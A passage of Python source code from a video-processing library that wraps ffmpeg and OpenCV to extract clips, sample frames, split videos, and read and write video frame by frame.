out_opts = ["-vsync", "0"]
if duration is not None:
if not etau.is_str(duration):
duration = "%.3f" % duration
out_opts.extend(["-t", duration])
if not fast:
# Extract clip carefully and accurately by decoding every frame
ffmpeg = FFmpeg(in_opts=in_opts, out_opts=out_opts)
ffmpeg.run(video_path, output_path)
return
with etau.TempDir() as d:
tmp_path = os.path.join(d, os.path.basename(output_path))
# Extract clip as accurately and quickly as possible by only touching
# key frames. May lave blank frames in the video
out_opts.extend(["-c", "copy"])
ffmpeg = FFmpeg(in_opts=in_opts, out_opts=out_opts)
ffmpeg.run(video_path, tmp_path)
# Clean up fast output by re-encoding the extracted clip
# Note that this may not exactly correspond to the slow, accurate
# implementation above
ffmpeg = FFmpeg(out_opts=["-vsync", "0"])
ffmpeg.run(tmp_path, output_path)
def extract_clip_frames(
video_path,
output_patt,
start_time=None,
duration=None,
keep_source_frame_numbers=False,
):
"""Extracts the frames of the specified clip from the video.
Args:
video_path: the path to the video
output_patt: the pattern to which to write the extracted frames, like
"/path/to/frames/%06d.png"
start_time: the start timestamp, which can either be a float value of
seconds or a string in "HH:MM:SS.XXX" format. If omitted, the
beginning of the video is used
duration: the clip duration, which can either be a float value of
seconds or a string in "HH:MM:SS.XXX" format. If omitted, the clip
extends to the end of the video
keep_source_frame_numbers: whether to write the output frames with
their frame numbers from the source video. If False (the default),
the output frames are written with frame numbers starting from 1
"""
frames = get_frame_range_for_clip(
video_path, start_time=start_time, duration=duration
)
with FFmpegVideoReader(video_path, frames=frames) as vr:
for idx, img in enumerate(vr, 1):
if keep_source_frame_numbers:
outpath = output_patt % vr.frame_number
else:
outpath = output_patt % idx
etai.write(img, outpath)
def extract_frame(video_path, output_path, start_time=None):
"""Extracts a single frame from the local video or from the live stream and
saves it to an image.
This extraction function is the simplest of the extract command in this
video code and strictly extracts a single frame either from the beginning
of a video or stream or at some point in the video or stream.
Uses the following ffmpeg command::
ffmpeg -y -i <video_path> -ss <start_time> -vframes 1 ${output_path} \
>/dev/null 2>&1
Args:
video_path: the path or m3u8 stream to a video
output_path: the path to the image to write the frame
start_time: a string in the ffmpeg time duration format, as follows,
[-][HH:]MM:SS[.m...]
https://ffmpeg.org/ffmpeg-utils.html#time-duration-syntax
"""
in_opts = ["-vsync", "0"]
if start_time is not None:
if not etau.is_str(start_time):
start_time = "%.3f" % start_time
in_opts.extend(["-ss", start_time])
ffmpeg = FFmpeg(in_opts=in_opts, out_opts=["-vsync", "0", "-vframes", "1"])
ffmpeg.run(video_path, output_path)
def _make_ffmpeg_select_arg(frames):
ss = "+".join(["eq(n\\,%d)" % (f - 1) for f in frames])
return "select='%s'" % ss
def sample_select_frames(
video_path, frames, output_patt=None, size=None, fast=False
):
"""Samples the specified frames of the video.
This method is *intentionally* designed to be extremely graceful. It will
sample whatever frames it can from the video you provide and will
gracefully exit rather than raising an error if `ffmpeg` cannot understand
some frames of the video you provide.
When `fast=False`, this implementation uses VideoProcessor.
When `fast=True`, this implementation uses ffmpeg's `-vf select` option.
In this case, it may resort to `fast=False` internally if one of the
following conditions occur:
(a) more than 131072 frames are requested. This is a limitation of
`subprocess` (cf. https://stackoverflow.com/q/29801975)
(b) the fast implementation failed to generate at least 90%% of the
target frames. This can happen if `ffmpeg -vf select` is confused
by the the video it encounters. We have empirically found that
VideoProcessor may be able to extract more frames such cases
Args:
video_path: the path to the video
frames: a sorted list of frame numbers to sample
output_patt: an optional output pattern like "/path/to/frames-%d.png"
specifying where to write the sampled frames. If omitted, the
frames are instead returned in an in-memory list
size: an optional (width, height) to resize the sampled frames. By
default, the native dimensions of the frames are used
fast: whether to use a native ffmpeg method to perform the extraction.
While faster, this may be inconsistent with other video processing
methods in ETA. By default, this is False
Returns:
If `output_patt != None`, this function returns None.
If `output_patt == None`, this method returns an (imgs, frames) tuple
where `imgs` is the list of sampled frames, and `frames` is the list
of frames that were succesfully sampled. If no errors were encountered,
the output `frames` will match the input `frames`
"""
if fast:
try:
return _sample_select_frames_fast(
video_path, frames, output_patt, size
)
except SampleSelectFramesError as e:
logger.warning("Select frames fast mode failed: '%s'", e)
logger.info("Reverting to `fast=False`")
return _sample_select_frames_slow(video_path, frames, output_patt, size)
class SampleSelectFramesError(Exception):
"""Exception raised when the `sample_select_frames` method encounters an
error.
"""
pass
def _sample_select_frames_fast(video_path, frames, output_patt, size):
#
# As per https://stackoverflow.com/q/29801975, one cannot pass an
# argument of length > 131072 to subprocess. So, we have to make sure the
# user isn't requesting too many frames to handle
#
select_arg_str = _make_ffmpeg_select_arg(frames)
if len(select_arg_str) > 131072:
raise SampleSelectFramesError(
"Number of frames (%d) requested too large" % len(frames)
)
# If reading into memory, use `png` to ensure lossless-ness
ext = os.path.splitext(output_patt)[1] if output_patt else ".png"
#
# Analogous to FFmpegVideoReader, our approach here is to gracefully
# fail and just give the user however many frames we can...
#
with etau.TempDir() as d:
# Sample frames to disk temporarily
tmp_patt = os.path.join(d, "frame-%06d" + ext)
ffmpeg = FFmpeg(
size=size, out_opts=["-vf", select_arg_str, "-vsync", "0"]
)
try:
ffmpeg.run(video_path, tmp_patt)
except etau.ExecutableRuntimeError as e:
# Graceful failure if frames couldn't be sampled
logger.warning(etau.summarize_long_str(str(e), 500))
logger.warning(
"A sampling error occured; attempting to gracefully continue"
)
sampled_frames = etau.parse_pattern(tmp_patt)
out_frames = [frames[i - 1] for i in sampled_frames]
num_frames = len(sampled_frames)
num_target_frames = len(frames)
# Warn user if not all frames were sampled
if num_frames < num_target_frames:
logger.warning(
"Only %d/%d expected frames were sampled",
num_frames,
num_target_frames,
)
#
# If an insufficient number of frames were succesfully sampled, revert
# to slow mode
#
target_percent_complete = 0.9 # warning: magic number
percent_complete = num_frames / num_target_frames
if percent_complete < target_percent_complete:
raise SampleSelectFramesError(
"We only managed to sample %.1f%% of the frames; this is "
"below our target of %.1f%%, so let's try slow mode"
% (100 * percent_complete, 100 * target_percent_complete)
)
# Move frames into place with correct output names
if output_patt is not None:
for sample_idx, frame_number in zip(sampled_frames, out_frames):
tmp_path = tmp_patt % sample_idx
outpath = output_patt % frame_number
etau.move_file(tmp_path, outpath)
return None
# Return frames into memory
imgs = []
for sample_idx in sampled_frames:
imgs.append(etai.read(tmp_patt % sample_idx))
return imgs, out_frames
def _sample_select_frames_slow(video_path, frames, output_patt, size):
# Parse parameters
resize_images = size is not None
# Sample frames to disk via VideoProcessor
if output_patt:
p = VideoProcessor(
video_path, frames=frames, out_images_path=output_patt
)
with p:
for img in p:
if resize_images:
img = etai.resize(img, *size)
p.write(img)
return None
# Sample frames in memory via FFmpegVideoReader
imgs = []
out_frames = []
with FFmpegVideoReader(video_path, frames=frames) as r:
for img in r:
if resize_images:
img = etai.resize(img, *size)
imgs.append(img)
out_frames.append(r.frame_number)
return imgs, out_frames
def sample_first_frames(imgs_or_video_path, k, stride=1, size=None):
"""Samples the first k frames in a video.
Args:
imgs_or_video_path: can be either the path to the input video or an
array of frames of size (num_frames, height, width, num_channels)
k: number of frames to extract
stride: number of frames to be skipped in between. By default, a
contiguous array of frames in extracted
size: an optional (width, height) to resize the sampled frames. By
default, the native dimensions of the frames are used
Returns:
a numpy array of size [k, height, width, num_channels]
"""
# Read frames ...
if etau.is_str(imgs_or_video_path):
# ... from disk
video_path = imgs_or_video_path
frames = [i for i in range(1, stride * k + 1, stride)]
with FFmpegVideoReader(video_path, frames=frames) as vr:
imgs_out = [img for img in vr]
else:
# ... from tensor
imgs = imgs_or_video_path
imgs_out = imgs[: (k * stride) : stride]
# Duplicate last frame if necessary
if k > len(imgs_out):
num_repeats = k - len(imgs_out)
imgs_out = np.asarray(imgs_out)
imgs_out = np.concatenate(
(
imgs_out,
np.repeat(imgs_out[-1][np.newaxis], num_repeats, axis=0),
)
)
# Resize frames, if necessary
if size is not None:
imgs_out = [etai.resize(img, *size) for img in imgs_out]
return np.array(imgs_out)
def uniformly_sample_frames(imgs_or_video_path, k, size=None):
"""Uniformly samples k frames from the video, always including the first
and last frames.
If k is larger than the number of frames in the video, duplicate frames
will be included as necessary so that k frames are always returned.
Args:
imgs_or_video_path: can be either the path to the input video or an
array of frames of size (num_frames, height, width, num_channels)
k: the number of frames to extract
size: an optional (width, height) to resize the sampled frames. By
default, the native dimensions of the frames are used
Returns:
a numpy array of size [k, height, width, num_channels]
"""
is_video = etau.is_str(imgs_or_video_path)
if is_video:
video_path = imgs_or_video_path
else:
imgs = imgs_or_video_path
# Compute 1-based frames
num_frames = get_frame_count(video_path) if is_video else len(imgs)
frames = [int(round(i)) for i in np.linspace(1, min(num_frames, k), k)]
# Read frames ...
if is_video:
# ... from disk
with FFmpegVideoReader(video_path, frames=frames) as vr:
imgs_out = [img for img in vr]
else:
# ... from tensor
imgs_out = [imgs[f - 1] for f in frames]
# Resize frames, if necessary
if size is not None:
imgs_out = [etai.resize(img, *size) for img in imgs_out]
return np.array(imgs_out)
def sliding_window_sample_frames(imgs_or_video_path, k, stride, size=None):
"""Samples clips from the video using a sliding window of the given
length and stride.
If k is larger than the number of frames in the video, duplicate frames
will be included as necessary so that one window of size k can be returned.
Args:
imgs_or_video_path: can be either the path to the input video or an
array of frames of size (num_frames, height, width, num_channels)
k: the size of each window
stride: the stride for sliding window
size: an optional (width, height) to resize the sampled frames. By
default, the native dimensions of the frames are used
Returns:
a numpy array of size [XXXX, k, height, width, num_channels]
"""
is_video = etau.is_str(imgs_or_video_path)
if is_video:
video_path = imgs_or_video_path
else:
imgs = imgs_or_video_path
# Determine clip indices
num_frames = get_frame_count(video_path) if is_video else len(imgs)
if k <= num_frames:
delta = np.arange(1, k + 1)
offsets = np.array(list(range(0, num_frames + 1 - k, stride)))
clip_inds = offsets[:, np.newaxis] + delta[np.newaxis, :]
else:
# Duplicate last frame as necessary to fill one window of size k
clip_inds = np.concatenate(
(np.arange(1, num_frames + 1), [num_frames] * (k - num_frames))
)[np.newaxis]
# Read frames ...
imgs_dict = {}
frames = list(np.unique(clip_inds))
if is_video:
# ... from disk
with FFmpegVideoReader(video_path, frames=frames) as vr:
for img in vr:
imgs_dict[vr.frame_number] = img
else:
# ... from tensor
for fn in frames:
imgs_dict[fn] = imgs[fn - 1]
# Resize frames, if necessary
if size is not None:
imgs_dict = {
fn: etai.resize(img, *size) for fn, img in iteritems(imgs_dict)
}
# Generate clips tensor
clips = []
for inds in clip_inds:
clips.append(np.array([imgs_dict[k] for k in inds]))
return np.array(clips)
def extract_keyframes(video_path, output_patt=None):
"""Extracts the keyframes from the video.
Keyframes are a set of video frames that mark the start of a transition,
and are faster to extract than an arbitrary frame.
Args:
video_path: the path to the video
output_patt: an optional output pattern like "/path/to/frames-%d.png"
specifying where to write the sampled frames. If omitted, the
frames are instead returned in an in-memory list
Returns:
a list of the keyframes if output_patt is None, and None otherwise
"""
if output_patt:
# Write frames to disk via VideoProcessor
p = VideoProcessor(
video_path, keyframes_only=True, out_images_path=output_patt
)
with p:
for img in p:
p.write(img)
return None
# Load frames into memory via FFmpegVideoReader
with FFmpegVideoReader(video_path, keyframes_only=True) as r:
return [img for img in r]
def split_video(
video_path,
output_patt,
num_clips=None,
clip_duration=None,
clip_size_bytes=None,
):
"""Splits the video into (roughly) equal-sized clips of the specified size.
Exactly one keyword argument should be provided.
This implementation uses an `ffmpeg` command of the following form::
ffmpeg \
-i input.mp4 \
-c copy -segment_time SS.XXX -f segment -reset_timestamps 1 \
output-%03d.mp4
Args:
video_path: the path to the video
output_patt: an output pattern like "/path/to/clips-%03d.mp4"
specifying where to write the output clips
num_clips: the number of (roughly) equal size clips to break the
video into
clip_duration: the (approximate) duration, in seconds, of each clip to
generate. The last clip may be shorter
clip_size_bytes: the (approximate) size, in bytes, of each clip to
generate. The last clip may be smaller
"""
#
# Determine segment time
#
metadata = VideoMetadata.build_for(video_path)
if clip_size_bytes:
num_clips = metadata.size_bytes / clip_size_bytes
if num_clips:
# Round up to nearest second to ensure that an additional small clip
# is not created at the end
segment_time = np.ceil(metadata.duration / num_clips)
elif clip_duration:
segment_time = clip_duration
else:
raise ValueError("One keyword argument must be provided")
#
# Perform clipping
#
in_opts = []
out_opts = [
"-c:v",
"copy",
"-segment_time",
"%.3f" % segment_time,
"-f",
"segment",
"-reset_timestamps",
"1",
]
ffmpeg = FFmpeg(in_opts=in_opts, out_opts=out_opts)
ffmpeg.run(video_path, output_patt)
class VideoProcessor(object):
"""Class for reading a video and writing a new video frame-by-frame.
The typical usage is::
with VideoProcessor(...) as p:
for img in p:
new_img = ... # process img
p.write(new_img)
"""
def __init__(
self,
inpath,
frames=None,
keyframes_only=False,
in_use_ffmpeg=True,
out_use_ffmpeg=True,
out_images_path=None,
out_video_path=None,
out_clips_path=None,
out_fps=None,
out_size=None,
out_opts=None,
):
"""Creates a VideoProcessor instance.
Args:
inpath: path to the input video. Passed directly to a VideoReader
frames: an optional range(s) of frames to process. This argument
is passed directly to VideoReader
keyframes_only: whether to only extract keyframes when reading the
video. Can only be set to True when `in_use_ffmpeg=True`. When
this is True, `frames` is interpreted as keyframe numbers
in_use_ffmpeg: whether to use FFmpegVideoReader to read input
videos rather than OpenCVVideoReader
out_use_ffmpeg: whether to use FFmpegVideoWriter to write output
videos rather than OpenCVVideoWriter
out_images_path: a path like "/path/to/frames/%05d.png" with one
placeholder that specifies where to save frames as individual
images when the write() method is called. When out_images_path
is None or "", no images are written
out_video_path: a path like "/path/to/video.mp4" that specifies
where to save a single output video that contains all of the
frames passed to the write() method concatenated together,
regardless of any potential frame range gaps. When
out_video_path is None or "", no video is written
out_clips_path: a path like "/path/to/video/%05d-%05d.mp4" with two
placeholders that specifies where to save output video clips
for each frame range when the write() method is called. When
out_clips_path is None or "", no videos are written
out_fps: a frame rate for the output video, if any. If the input
source is a video and fps is None, the same frame rate is used
out_size: the frame size for the output video, if any. If out_size
is None, the input frame size is assumed
out_opts: a list of output video options for FFmpeg. Passed
directly to FFmpegVideoWriter. Only applicable when
out_use_ffmpeg = True
Raises:
VideoProcessorError: if insufficient options are supplied to
construct a VideoWriter
"""
if in_use_ffmpeg:
self._reader = FFmpegVideoReader(
inpath, frames=frames, keyframes_only=keyframes_only
)
elif keyframes_only:
raise VideoProcessorError(
"Must have `in_use_ffmpeg=True` when `keyframes_only=True`"
)
else:
self._reader = OpenCVVideoReader(inpath, frames=frames)
self._video_clip_writer = None
self._video_writer = None
self._write_images = bool(out_images_path)
self._write_video = bool(out_video_path)
self._write_clips = bool(out_clips_path)
self.inpath = inpath
self.frames = frames
self.in_use_ffmpeg = in_use_ffmpeg
self.out_use_ffmpeg = out_use_ffmpeg
self.out_images_path = out_images_path
self.out_video_path = out_video_path
self.out_clips_path = out_clips_path
if out_fps is not None and out_fps > 0:
self.out_fps = out_fps
elif self._reader.frame_rate > 0:
self.out_fps = self._reader.frame_rate
else:
raise VideoProcessorError(
"The inferred frame rate '%s' cannot be used. You must "
+ "manually specify a frame rate"
% str(self._reader.frame_rate)
)
self.out_size = out_size if out_size else self._reader.frame_size
self.out_opts = out_opts
if self._write_video:
self._video_writer = self._new_video_writer(self.out_video_path)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __len__(self):
return len(self._reader)
def __iter__(self):
return self
def __next__(self):
return self.process()
@property
def input_frame_size(self):
"""The (width, height) of each input frame."""
return self._reader.frame_size
@property
def output_frame_size(self):
"""The (width, height) of each output frame."""
return self.out_size
@property
def input_frame_rate(self):
"""The input frame rate."""
return self._reader.frame_rate
@property
def output_frame_rate(self):
"""The output frame rate."""
return self.out_fps
@property
def frame_number(self):
"""The current frame number, or -1 if no frames have been read."""
return self._reader.frame_number
@property
def frame_range(self):
"""The (first, last) frames for the current range, or (-1, -1) if no
frames have been read.
"""
return self._reader.frame_range
@property
def is_new_frame_range(self):
"""Whether the current frame is the first in a new range."""
return self._reader.is_new_frame_range
@property
def total_frame_count(self):
"""The total number of frames in the video."""
return self._reader.total_frame_count
def process(self):
"""Returns the next frame.
Returns:
img: the frame as a numpy array
"""
img = self._reader.read()
if self._write_clips and self._reader.is_new_frame_range:
self._reset_video_clip_writer()
return img
def write(self, img):
"""Appends the image to the output VideoWriter(s).
Args:
img: an numpy array containing the image
"""
if self._write_images:
etai.write(img, self.out_images_path % self._reader.frame_number)
if self._write_video:
self._video_writer.write(img)
if self._write_clips:
self._video_clip_writer.write(img)
def close(self):
"""Closes the video processor."""
self._reader.close()
if self._video_writer is not None:
self._video_writer.close()
if self._video_clip_writer is not None:
self._video_clip_writer.close()
def _reset_video_clip_writer(self):
if self._video_clip_writer is not None:
self._video_clip_writer.close()
outpath = self.out_clips_path % self._reader.frame_range
self._video_clip_writer = self._new_video_writer(outpath)
def _new_video_writer(self, outpath):
if self.out_use_ffmpeg:
return FFmpegVideoWriter(
outpath, self.out_fps, self.out_size, out_opts=self.out_opts
)
return OpenCVVideoWriter(outpath, self.out_fps, self.out_size)
class VideoProcessorError(Exception):
"""Exception raised when a problem with a VideoProcessor is encountered."""
pass
class VideoReader(object):
"""Base class for reading videos.
This class declares the following conventions:
(a) `VideoReader`s implement the context manager interface. This means
that models can optionally use context to perform any necessary
setup and teardown, and so any code that uses a VideoReader
should use the `with` syntax
(b) `VideoReader`s support a `reset()` method that allows them to be
reset back to their first frame, on demand
"""
def __init__(self, inpath, frames):
"""Initializes a VideoReader base instance.
Args:
inpath: the input video path
frames: one of the following quantities specifying a collection of
frames to process:
- None (all frames)
- "*" (all frames)
- a string like "1-3,6,8-10"
- an `eta.core.frameutils.FrameRange` instance
- an `eta.core.frameutils.FrameRanges` instance
- an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
need to be in sorted order
"""
self.inpath = inpath
# Parse frames
if frames is None or frames == "*":
frames = "1-%d" % self.total_frame_count
self._ranges = etaf.parse_frame_ranges(frames)
self.frames = self._ranges.to_human_str()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __len__(self):
return len(self._ranges)
def __iter__(self):
return self
def __next__(self):
return self.read()
def close(self):
"""Closes the VideoReader.
Subclasses can override this method if necessary.
"""
pass
def reset(self):
"""Resets the VideoReader so that the next call to `read()` will return
the first frame.
"""
raise NotImplementedError("subclass must implement reset()")
def _reset(self):
"""Base VideoReader implementation of `reset()`. Subclasses must call
this method internally within `reset()`.
"""
self._ranges.reset()
@property
def frame_number(self):
"""The current frame number, or -1 if no frames have been read."""
return self._ranges.frame
@property
def frame_range(self):
"""The (first, last) frames for the current range, or (-1, -1) if no
frames have been read.
"""
return self._ranges.frame_range
@property
def is_new_frame_range(self):
"""Whether the current frame is the first in a new range."""
return self._ranges.is_new_frame_range
@property
def encoding_str(self):
"""The video encoding string."""
raise NotImplementedError("subclass must implement encoding_str")
@property
def frame_size(self):
"""The (width, height) of each frame."""
raise NotImplementedError("subclass must implement frame_size")
@property
def frame_rate(self):
"""The frame rate."""
raise NotImplementedError("subclass must implement frame_rate")
@property
def total_frame_count(self):
"""The total number of frames in the video."""
raise NotImplementedError("subclass must implement total_frame_count")
def read(self):
"""Reads the next frame.
Returns:
img: the next frame
"""
raise NotImplementedError("subclass must implement read()")
class VideoReaderError(Exception):
"""Exception raised when a problem with a VideoReader is encountered."""
pass
class FFmpegVideoReader(VideoReader):
"""Class for reading video using ffmpeg.
The input video can be a standalone video file like "/path/to/video.mp4"
or a directory of frames like "/path/to/frames/%05d.png". This path is
passed directly to ffmpeg.
A frames string like "1-5,10-15" can optionally be passed to only read
certain frame ranges.
This class uses 1-based indexing for all frame operations.
"""
def __init__(self, inpath, frames=None, keyframes_only=False):
"""Creates an FFmpegVideoReader instance.
Args:
inpath: path to the input video, which can be a standalone video
file like "/path/to/video.mp4" or a directory of frames like
"/path/to/frames/%05d.png". This path is passed directly to
ffmpeg
frames: one of the following optional quantities specifying a
collection of frames to process:
- None (all frames - the default)
- "*" (all frames)
- a string like "1-3,6,8-10"
- an `eta.core.frameutils.FrameRange` instance
- an `eta.core.frameutils.FrameRanges` instance
- an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
need to be in sorted order
keyframes_only: whether to only read keyframes. By default, this
is False. When this is True, `frames` is interpreted as
keyframe numbers
"""
# Parse args
if keyframes_only:
in_opts = ["-skip_frame", "nokey", "-vsync", "0"]
else:
in_opts = None
self._stream_info = VideoStreamInfo.build_for(inpath)
self._ffmpeg = FFmpeg(
in_opts=in_opts,
out_opts=[
"-vsync",
"0", # never omit frames
"-f",
"image2pipe", # pipe frames to stdout
"-vcodec",
"rawvideo", # output will be raw video
"-pix_fmt",
"rgb24", # pixel format
],
)
self._raw_frame = None
self._open_stream(inpath)
super(FFmpegVideoReader, self).__init__(inpath, frames)
def close(self):
"""Closes the FFmpegVideoReader."""
self._ffmpeg.close()
def reset(self):
"""Resets the FFmpegVideoReader."""
self.close()
self._reset()
self._open_stream(self.inpath)
@property
def encoding_str(self):
"""The video encoding string."""
return self._stream_info.encoding_str
@property
def frame_size(self):
"""The (width, height) of each frame."""
return self._stream_info.frame_size
@property
def frame_rate(self):
"""The frame rate."""
return self._stream_info.frame_rate
@property
def total_frame_count(self):
"""The total number of frames in the video, or 0 if it could not be
determined.
"""
return self._stream_info.total_frame_count
def read(self):
"""Reads the next frame.
If any problem is encountered while reading the frame, a warning is
logged and a StopIteration is raised. This means that FFmpegVideoReader
will gracefully fail when malformed videos are encountered.
Returns:
img: the next frame
Raises:
StopIteration: if there are no more frames to process or the next
frame could not be read or parsed for any reason
"""
for _ in range(max(0, self.frame_number), next(self._ranges)):
if not self._grab():
logger.warning(
"Failed to grab frame %d. Raising StopIteration now",
self.frame_number,
)
raise StopIteration
return self._retrieve()
def _grab(self):
try:
width, height = self.frame_size
self._raw_frame = self._ffmpeg.read(width * height * 3)
return True
except Exception as e:
logger.warning(e, exc_info=True)
self._raw_frame = None
return False
def _retrieve(self):
# Stop when ffmpeg returns empty bits. This can happen when the end of
# the video is reached
if not self._raw_frame:
logger.warning(
"Found empty frame %d. Raising StopIteration now",
self.frame_number,
)
raise StopIteration
width, height = self.frame_size
try:
vec = np.fromstring(self._raw_frame, dtype="uint8")
return vec.reshape((height, width, 3))
except ValueError as e:
# Possible alternative: return all zeros matrix instead
# return np.zeros((height, width, 3), dtype="uint8")
logger.warning(e, exc_info=True)
logger.warning(
"Unable to parse frame %d; Raising StopIteration now",
self.frame_number,
)
raise StopIteration
def _open_stream(self, inpath):
self._ffmpeg.run(inpath, "-")
self._raw_frame = None
class SampledFramesVideoReader(VideoReader):
"""Class for reading video stored as sampled frames on disk.
This class uses 1-based indexing for all frame operations.
"""
def __init__(self, frames_dir, frames=None):
"""Creates a SampledFramesVideoReader instance.
Args:
frames_dir: the path to a directory of frames, which must be
parseable by `eta.core.utils.parse_dir_pattern()`
frames: one of the following optional quantities specifying a
collection of frames to process:
- None (all frames - the default)
- "*" (all frames)
- a string like "1-3,6,8-10"
- an `eta.core.frameutils.FrameRange` instance
- an `eta.core.frameutils.FrameRanges` instance
- an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
need to be in sorted order
"""
self._frames_dir = None
self._frames_patt = None
self._frame_size = None
self._total_frame_count = None
all_frames = self._init_for_frames_dir(frames_dir)
if frames is None or frames == "*":
frames = all_frames
super(SampledFramesVideoReader, self).__init__(frames_dir, frames)
def reset(self):
"""Resets the SampledFramesVideoReader."""
self.close()
self._reset()
@property
def encoding_str(self):
"""The video encoding string."""
return None
@property
def frame_size(self):
"""The (width, height) of each frame."""
return self._frame_size
@property
def frame_rate(self):
"""The frame rate."""
return None
@property
def total_frame_count(self):
"""The total number of frames in the video, or 0 if it could not be
determined.
"""
return self._total_frame_count
def read(self):
"""Reads the next frame.
Returns:
img: the next frame
Raises:
StopIteration: if there are no more frames to process or the next
frame could not be read or parsed for any reason
"""
frame_number = next(self._ranges)
try:
return etai.read(self._frames_patt % frame_number)
except:
logger.warning(
"Failed to grab frame %d. Raising StopIteration now",
frame_number,
)
raise StopIteration
def _init_for_frames_dir(self, frames_dir):
frames_patt, all_frames = etau.parse_dir_pattern(frames_dir)
if not all_frames:
raise ValueError("Found no frames in '%s'" % frames_dir)
img = etai.read(frames_patt % all_frames[0])
self._frames_dir = frames_dir
self._frames_patt = frames_patt
self._frame_size = etai.to_frame_size(img=img)
self._total_frame_count = all_frames[-1]
return all_frames
class OpenCVVideoReader(VideoReader):
"""Class for reading video using OpenCV.
The input video can be a standalone video file like "/path/to/video.mp4"
or a directory of frames like "/path/to/frames/%05d.png". This path is
passed directly to cv2.VideoCapture. So, for example, if you specify a
directory of frames, the frame numbering must start from 0-3.
A frames string like "1-5,10-15" can optionally be passed to only read
certain frame ranges.
This class uses 1-based indexing for all frame operations.
"""
def __init__(self, inpath, frames=None):
"""Creates an OpenCVVideoReader instance.
Args:
inpath: path to the input video, which can be a standalone video
file like "/path/to/video.mp4" or a directory of frames like
"/path/to/frames/%05d.png". This path is passed directly to
cv2.VideoCapture
frames: one of the following optional quantities specifying a
collection of frames to process:
- None (all frames - the default)
- "*" (all frames)
- a string like "1-3,6,8-10"
- an `eta.core.frameutils.FrameRange` instance
- an `eta.core.frameutils.FrameRanges` instance
- an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
need to be in sorted order
Raises:
OpenCVVideoReaderError: if the input video could not be opened
"""
self._cap = None
self._open_stream(inpath)
super(OpenCVVideoReader, self).__init__(inpath, frames)
def close(self):
"""Closes the OpenCVVideoReader."""
if self._cap is not None:
self._cap.release()
self._cap = None
def reset(self):
"""Resets the OpenCVVideoReader."""
self.close()
self._reset()
self._open_stream(self.inpath)
@property
def encoding_str(self):
"""Return the video encoding string."""
try:
# OpenCV 3
code = int(self._cap.get(cv2.CAP_PROP_FOURCC))
except AttributeError:
# OpenCV 2
# pylint: disable=no-member
code = int(self._cap.get(cv2.cv.CV_CAP_PROP_FOURCC))
return FOURCC.int_to_str(code)
@property
def frame_size(self):
"""The (width, height) of each frame."""
try:
# OpenCV 3
return (
int(self._cap.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self._cap.get(cv2.CAP_PROP_FRAME_HEIGHT)),
)
except AttributeError:
# OpenCV 2
return (
# pylint: disable=no-member
int(self._cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
# pylint: disable=no-member
int(self._cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)),
)
@property
def frame_rate(self):
"""The frame rate."""
try:
# OpenCV 3
return float(self._cap.get(cv2.CAP_PROP_FPS))
except AttributeError:
# OpenCV 2
# pylint: disable=no-member
return float(self._cap.get(cv2.cv.CV_CAP_PROP_FPS))
@property
def total_frame_count(self):
"""The total number of frames in the video."""
try:
# OpenCV 3
return int(self._cap.get(cv2.CAP_PROP_FRAME_COUNT))
except AttributeError:
# OpenCV 2
# pylint: disable=no-member
return int(self._cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
def read(self):
"""Reads the next frame.
If any problem is encountered while reading the frame, a warning is
logged and a StopIteration is raised. This means that OpenCVVideoReader
will gracefully fail when malformed videos are encountered.
Returns:
img: the next frame
Raises:
StopIteration: if there are no more frames to process or the next
frame could not be read or parsed for any reason
"""
for _ in range(max(0, self.frame_number), next(self._ranges)):
if not self._grab():
logger.warning(
"Failed to grab frame %d. Raising StopIteration now",
self.frame_number,
)
raise StopIteration
return self._retrieve()
def _grab(self):
try:
return self._cap.grab()
except Exception as e:
logger.warning(e, exc_info=True)
return False
def _retrieve(self):
try:
img_bgr = self._cap.retrieve()[1]
return etai.bgr_to_rgb(img_bgr)
except Exception as e:
logger.warning(e, exc_info=True)
logger.warning(
"Unable to parse frame %d; Raising StopIteration now",
self.frame_number,
)
raise StopIteration
def _open_stream(self, inpath):
self._cap = cv2.VideoCapture(inpath)
if not self._cap.isOpened():
raise OpenCVVideoReaderError("Unable to open '%s'" % inpath)
class OpenCVVideoReaderError(VideoReaderError):
"""Error raised when a problem with an OpenCVVideoReader is encountered."""
pass
class VideoWriter(object):
"""Base class for writing videos.
This class declares the following conventions:
(a) `VideoWriter`s implement the context manager interface. This means
that subclasses can optionally use context to perform any necessary
setup and teardown, and so any code that uses a VideoWriter
should use the `with` syntax
"""
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def write(self, img):
"""Appends the image to the output video.
Args:
img: a numpy array
"""
raise NotImplementedError("subclass must implement write()")
def close(self):
"""Closes the VideoWriter."""
pass
class VideoWriterError(Exception):
"""Exception raised when a problem with a VideoWriter is encountered."""
pass
class FFmpegVideoWriter(VideoWriter):
"""Class for writing videos using ffmpeg."""
def __init__(self, outpath, fps, size, out_opts=None):
"""Creates an FFmpegVideoWriter instance.
Args:
outpath: the output video path. Existing files are overwritten,
and the directory is created if necessary
fps: the frame rate
size: the (width, height) of each frame
out_opts: an optional list of output options for FFmpeg
"""
self.outpath = outpath
self.fps = fps
self.size = size
self._ffmpeg = FFmpeg(
in_opts=[
"-f",
"rawvideo", # input will be raw video
"-vcodec",
"rawvideo", # input will be raw video
"-s",
"%dx%d" % self.size, # frame size
"-pix_fmt",
"rgb24", # pixel format
"-r",
str(self.fps), # frame rate
],
out_opts=out_opts,
)
self._ffmpeg.run("-", self.outpath)
def write(self, img):
"""Appends the image to the output video.
Args:
img: a numpy array
"""
self._ffmpeg.stream(img.tobytes())
def close(self):
"""Closes the FFmpegVideoWriter."""
self._ffmpeg.close()
class OpenCVVideoWriter(VideoWriter):
"""Class for writing videos using cv2.VideoWriter.
Uses the default encoding scheme for the extension of the output path.
"""
def __init__(self, outpath, fps, size):
"""Creates an OpenCVVideoWriter instance.
Args:
outpath: the output video path. Existing files are overwritten,
and the directory is created if necessary
fps: the frame rate
size: the (width, height) of each frame
Raises:
OpenCVVideoWriterError: if the writer failed to open
"""
self.outpath = outpath
self.fps = fps
self.size = size
